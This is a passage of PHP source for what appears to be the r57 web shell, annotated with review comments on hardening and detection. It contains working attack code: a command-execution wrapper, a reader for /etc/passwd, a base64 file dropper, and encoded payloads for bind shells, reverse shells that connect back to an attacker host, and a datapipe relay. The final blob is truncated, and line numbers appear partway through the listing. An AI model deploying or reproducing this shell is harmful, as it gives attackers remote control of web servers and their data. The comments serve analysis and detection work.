        // Show backslashes on Windows; the file name is not HTML-escaped.
        $r .= ($windows)? str_replace("/","\\",$file) : $file;
        // NOTE(review): "</ TD>" is malformed markup, kept as in the original.
        $r .= "</b></font></ TD>";
        $r .= "</TR>";
        foreach($v as $a=>$b)
        {
          $r .= "<TR>";
          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
          $r .= "</TR>\n";
        }
      }
      $r .= "</TABLE>";
    echo $r;
    }
    else
    {
      // Localized "nothing found" message.
      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
    }
  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  die();
  }
// Capability probe: runs `echo abctryag` through ex() and expects "tryag" at offset 3 of
// the output. Any other result, including no output at all, sets $safe_mode = 1, i.e. the
// script treats command execution as unavailable.
// The probe command line is a fixed string, so it is a usable indicator in
// process-execution logs for every request that reaches this point of the script.
if(strpos(ex("echo abctryag"),"tryag")!=3) { $safe_mode = 1; }
// Server banner from the environment, with "-" as the placeholder when it is empty.
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
// Return $i non-breaking-space entities, used as horizontal padding in the HTML output.
function ws($i)
{
    $padding = @str_repeat("&nbsp;", $i);
    return $padding;
}
// Command-execution wrapper: runs $cfe through the first available of exec, shell_exec,
// system, passthru and popen, and returns whatever the command printed ('' for an empty
// command or when no method is usable).
// This is the choke point for the shell's command features, which makes it the most
// useful place to reason about defence:
//  - Hardening: a function named in the php.ini disable_functions directive is reported as
//    missing by function_exists(), so the chain falls through to the next entry. All five
//    have to be disabled for this wrapper to return nothing.
//  - Detection: each branch makes the PHP / web-server process spawn a child command, which
//    is visible in process-creation telemetry regardless of which branch ran.
// Every call is prefixed with @, so failures leave no PHP warning in the error log.
function ex($cfe)
{
 $res = '';
 if (!empty($cfe))
 {
  if(function_exists('exec'))
   {
    // exec() appends output lines to $res; they are re-joined with newlines.
    @exec($cfe,$res);
    $res = join("\n",$res);
   }
  elseif(function_exists('shell_exec'))
   {
    $res = @shell_exec($cfe);
   }
  elseif(function_exists('system'))
   {
    // system() prints directly, so the output is captured with an output buffer.
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(function_exists('passthru'))
   {
    // Same buffering approach for passthru().
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(@is_resource($f = @popen($cfe,"r")))
  {
   // Last resort: read the command's output from a pipe in 1024-byte chunks.
   $res = "";
   while(!@feof($f)) { $res .= @fread($f,1024); }
   @pclose($f);
  }
 }
 return $res;
}
// Return the account names found in /etc/passwd as a list, or 0 when the file cannot be
// read (or is empty).
// Only the first ":"-separated field of each line is kept; lines starting with "#" are
// skipped. The file() call is not @-suppressed, unlike most calls in this script, so a
// failed read can surface as a PHP warning in the error log.
function get_users()
{
  $users = array();
  $rows=file('/etc/passwd');
  if(!$rows) return 0;
  foreach ($rows as $string)
   {
           $user = @explode(":",$string);
           if(substr($string,0,1)!='#') array_push($users,$user[0]);
   }
  return $users;
}
// Print a red "can't write in file" banner followed by $i, and return null.
// The Russian text is used when $GLOBALS['language'] is "ru"; any other value gets the
// English text. $i is concatenated into the HTML without escaping.
function we($i)
{
if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; }
else { $text = "[-] ERROR! Can't write in file "; }
echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
return null;
}
// Print a red "can't read file" banner followed by $i, and return null.
// The Russian text is used when $GLOBALS['language'] is "ru"; any other value gets the
// English text. $i is concatenated into the HTML without escaping.
function re($i)
{
if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; }
else { $text = "[-] ERROR! Can't read file "; }
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
return null;
}
// Print a red "can't create" banner followed by $i, and return null.
// The Russian text is used when $GLOBALS['language'] is "ru"; any other value gets the
// English text. $i is concatenated into the HTML without escaping.
function ce($i)
{
if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; }
else { $text = "Can't create "; }
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
return null;
}
// Print one of three FTP error banners and return null.
// $l selects the language table ('ru' or 'eng'); $n is the message index:
// 0 = connect failed, 1 = login failed, 2 = change-directory failed.
// Any other $l or $n reads an undefined array element and prints an empty banner.
function fe($l,$n)
{
$text['ru']  = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????');
$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server');
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
return null;
}
// Print a mail status banner and return null.
// $l selects the language table ('ru' or 'eng'); $n is the message index:
// 0 = sending failed, 1 = mail sent. Both messages use the same red banner styling.
function mr($l,$n)
{
$text['ru']  = array('?? ??????? ????????? ??????','?????? ??????????');
$text['eng'] = array('Can\'t send mail','Mail sent');
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
return null;
}
// Format a numeric file mode as an ls-style string (type character plus rwx triplets).
// Returns 0 when $GLOBALS['windows'] is set.
// NOTE(review): the type tests are bare bit-ANDs rather than comparisons against the
// masked type field, so the first branch whose bits overlap wins. A symlink mode (0xA000)
// contains the 0x2000 bit and is labelled 'c'; a socket (0xC000) contains 0x4000 and is
// labelled 'd'. The 'b', 'l' and 's' branches can never be reached, so the type column of
// this output is not reliable evidence of what a file actually is.
function perms($mode)
{
if ($GLOBALS['windows']) return 0;
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
// Owner, group and world permission bits.
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
// 0x800 / 0x400 / 0x200 overlay the execute column: lower case when the execute bit is
// also set, upper case when it is not.
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
// Build an HTML <input> tag from type, name, optional size (omitted when 0) and value.
// None of the arguments is escaped: type and name are written unquoted and value is only
// wrapped in double quotes. The SQL form earlier in the file passes $_POST values straight
// into $value, so request data is reflected into the panel's own markup.
function in($type,$name,$size,$value)
{
 $ret = "<input type=".$type." name=".$name." ";
 if($size != 0) { $ret .= "size=".$size." "; }
 $ret .= "value=\"".$value."\">";
 return $ret;
}
// Resolve a program name through the system `which` command (run via ex()).
// Returns the command's output when there is any, otherwise the name unchanged.
// $pr is interpolated into the command line without quoting, and the returned path is
// not trimmed here.
function which($pr)
{
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return $pr; }
}
// File dropper: base64-decodes $text and writes the result to $fname, truncating any
// existing file. On open failure the we() banner is printed and nothing is written.
// Presumably this is how the base64 blobs assigned later in the file are materialised on
// disk -- the call sites are not in this part of the listing, TODO confirm.
// New files written by the web-server account, particularly under /tmp, are the
// observable outcome.
function cf($fname,$text)
{
 $w_file=@fopen($fname,"w") or we($fname);
 if($w_file)
 {
 @fputs($w_file,@base64_decode($text));
 @fclose($w_file);
 }
}
// Build one two-cell table row: a right-aligned label cell $l percent wide holding $t1,
// followed by a left-aligned cell holding $t2. Nothing is escaped.
function sr($l,$t1,$t2)
{
    $labelCell = "<td class=td1 width=".$l."% align=right>".$t1."</td>";
    $valueCell = "<td class=td1 align=left>".$t2."</td>";
    return "<tr class=tr1>".$labelCell.$valueCell."</tr>";
}
// Define view_size() only when no function of that name exists yet.
if (!@function_exists("view_size"))
{
    // Format a byte count as a short string in B, KB, MB or GB, rounded to two decimals.
    function view_size($size)
    {
        $gib = 1073741824;
        $mib = 1048576;
        $kib = 1024;
        if ($size >= $gib) {
            return (@round($size / $gib * 100) / 100) . " GB";
        }
        if ($size >= $mib) {
            return (@round($size / $mib * 100) / 100) . " MB";
        }
        if ($size >= $kib) {
            return (@round($size / $kib * 100) / 100) . " KB";
        }
        return $size . " B";
    }
}
  // Recursively collect file paths under $dir and return them as a flat array.
  // $types is an optional ";"-separated list of extensions; each entry must include the
  // leading dot, because $ext is cut from the position of the last "." in the name.
  // An unreadable directory contributes nothing (opendir failure is suppressed).
  // NOTE(review): is_dir() is applied to every entry with no symlink or depth check, so a
  // link that points back up the tree can make the recursion run away.
  function DirFilesR($dir,$types='')
  {
    $files = Array();
    if(($handle = @opendir($dir)))
    {
      while (false !== ($file = @readdir($handle)))
      {
        if ($file != "." && $file != "..")
        {
          if(@is_dir($dir."/".$file))
            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
          else
          {
            // For a name without "." strrpos() returns false, so $ext becomes the whole
            // file name.
            $pos = @strrpos($file,".");
            $ext = @substr($file,$pos,@strlen($file)-$pos);
            if($types)
            {
              if(@in_array($ext,explode(';',$types)))
                $files[] = $dir."/".$file;
            }
            else
              $files[] = $dir."/".$file;
          }
        }
      }
      @closedir($handle);
    }
    return $files;
  }
  // Searches a set of directory trees for lines matching one or more words and keeps the
  // highlighted matches per file.
  // NOTE(review): the class relies on a PHP 4 style constructor (a method named after the
  // class). From PHP 8.0 such a method is no longer treated as a constructor, so
  // `new SearchResult(...)` would leave every property unset there.
  class SearchResult
  {
    var $text;
    var $FilesToSearch;
    var $ResultFiles;
    var $FilesTotal;
    var $MatchesCount;
    // NOTE(review): declared with a typo; the methods below use FileMatchesCount, which is
    // therefore created as a dynamic property.
    var $FileMatschesCount;
    var $TimeStart;
    var $TimeTotal;
    var $titles;
    // $dir is a ";"-separated list of start directories, $text the search words, $filter an
    // optional ";"-separated extension list passed through to DirFilesR().
    // The full file list is built eagerly here, before any searching starts.
    function SearchResult($dir,$text,$filter='')
    {
      $dirs = @explode(";",$dir);
      $this->FilesToSearch = Array();
      for($a=0;$a<count($dirs);$a++)
        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
      $this->text = $text;
      $this->FilesTotal = @count($this->FilesToSearch);
      $this->TimeStart = getmicrotime();
      $this->MatchesCount = 0;
      $this->ResultFiles = Array();
      $this->FileMatchesCount = Array();
      $this->titles = Array();
    }
    // Plain accessors for the values filled in by the constructor and SearchText().
    function GetFilesTotal() { return $this->FilesTotal; }
    function GetTitles() { return $this->titles; }
    function GetTimeTotal() { return $this->TimeTotal; }
    function GetMatchesCount() { return $this->MatchesCount; }
    function GetFileMatchesCount() { return $this->FileMatchesCount; }
    function GetResultFiles() { return $this->ResultFiles; }
    // Run the search. $phrase wraps each word in \b word boundaries; $case = 0 adds the
    // case-insensitive flag. Words are split on spaces and joined as a regex alternation.
    // The words are not passed through preg_quote(), so the input is interpreted as a
    // regular expression, and a "/" in it ends the pattern early.
    function SearchText($phrase=0,$case=0) {
    $qq = @explode(' ',$this->text);
    $delim = '|';
      if($phrase)
        foreach($qq as $k=>$v)
          $qq[$k] = '\b'.$v.'\b';
      $words = '('.@implode($delim,$qq).')';
      $pattern = "/".$words."/";
      if(!$case)
        $pattern .= 'i';
      foreach($this->FilesToSearch as $k=>$filename)
      {
        $this->FileMatchesCount[$filename] = 0;
        // NOTE(review): `@next` is not a loop-control statement; it is evaluated as a bare
        // constant. When the read fails $FileStrings is false and the loop below is what
        // is relied on to do nothing.
        $FileStrings = @file($filename) or @next;
        for($a=0;$a<@count($FileStrings);$a++)
        {
          $count = 0;
          $CurString = $FileStrings[$a];
          $CurString = @Trim($CurString);
          // Tags are stripped before matching, so markup in the searched file is not
          // carried into the result page.
          $CurString = @strip_tags($CurString);
          $aa = '';
          if(($count = @preg_match_all($pattern,$CurString,$aa)))
          {
            // Wrap each match in a coloured span; results are keyed by 1-based line number.
            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
            $this->ResultFiles[$filename][$a+1] = $CurString;
            $this->MatchesCount += $count;
            $this->FileMatchesCount[$filename] += $count;
          }
        }
      }
      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
    }
  }
1566   function getmicrotime()
1567   {
1568     list($usec,$sec) = @explode(" ",@microtime());
1569     return ((float)$usec + (float)$sec);
1570   }
1571 $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
1572 A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
1573 GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
1574 b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
1575 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
1576 NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
1577 ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
1578 ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
1579 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
1580 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
1581 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
1582 dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
1583 lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
1584 $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
1585 VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
1586 JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
1587 TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
1588 lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
1589 Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
1590 Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
1591 lIENPTk47DQpleGl0IDA7DQp9DQp9";
1592 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
1593 aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
1594 hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
1595 sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
1596 kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
1597 KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
1598 OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1599 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
1600 BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
1601 SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
1602 KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
1603 sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
1604 Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
1605 QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
1606 Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1607 $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
1608 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
1609 HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
1610 aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
1611 lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
1612 xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
1613 W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
1614 LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
1615 udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
1616 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
1617 iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
1618 KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
1619 gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
1620 hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
1621 iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
1622 ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
1623 vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
1624 AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
1625 QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
1626 ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
1627 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
1628 wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
1629 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
1630 MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
1631 gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
1632 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
1633 HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
1634 dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
1635 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
1636 ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
1637 E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
1638 Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
1639 NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
1640 J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
1641 CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
1642 dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
